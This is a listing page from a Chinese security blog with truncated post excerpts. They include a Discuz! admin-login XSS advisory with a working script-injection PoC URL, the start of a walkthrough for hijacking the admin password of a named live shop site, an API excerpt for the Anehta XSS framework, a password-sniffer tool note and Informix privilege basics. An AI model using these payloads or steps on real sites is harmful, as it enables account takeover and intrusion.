鬼仔's Blog

由于Discuz!的后台登陆文件$url_forward没有过滤导致一个严重的xss bug.
author: 80vul-B
team:http://www.80vul.com

漏洞存在于文件admin/login.inc.php里$url_forward没有被过滤导致xss漏洞:

<input type="hidden" name="url_forward" value="$url_forward">

poc:
http://127.0.0.1/discuz/admincp.php?url_forward=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
[管理员或版主前台登录,但未登录后台时触发]

文章作者：121711090
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..
这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...
但为了我们的网络更安全..还是看看吧...

首先先看看这个站吧:http://demo1.xpshop.cn/
先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704

好..还是用啊D打开网站比较好..看截图:记得要保留cookies
阅读全文 »

作者：刺

这本是下个版本里的help()函数功能，现在单独拿出来做一个速查手册。

个别API包括在下一个版本中。

Anehta core API Help:
anehta.core.freeze(ms); //freeze current page during the time(ms)

anehtaCache.addItem(Key, Value); //add a key to cache; return Value;
阅读全文 »

作者：cnqing

PS:应邀写了篇帮助

Websniff 1.0 是user权限的 rawsocket sniff，可以截取ftp,http,smtp ...等密码，在渗透过程中绝对实用的工具。cncert网站发布的websniff需要 .net 2.0，客户端用firefox，如果用IE会让你错过一个参数设置。

先看下截图
阅读全文 »

作者：刺

有心的朋友可能已经注意到了，Anehta 中实现了一个客户端Cache。

位置在core里面：
anehta.core.cache = function(){}

在core中我预定义了一个变量，可以让我们很方便的操作cache：

// 初始化一个cache出来共享数据
var anehtaCache = new anehta.core.cache();
阅读全文 »

by amxku
2008-10-29
http://www.amxku.net

在Informix中，有三个数据库特权级别：DBA、Resource 和 Connect
Connect 特权允许用户访问数据库以及添加、修改和删除数据。
Resource 特权授予用户所有 Connect 特权，还授予创建新的表、索引和过程的特权。
DBA 特权包括 Connect 和 Resurce 特权，还授予用户把 Resource、Connect 或DBA 特权授予其他用户的权力。具有DBA 特权的用户还可以删除数据库中的所有对象或完全删除数据库。
阅读全文 »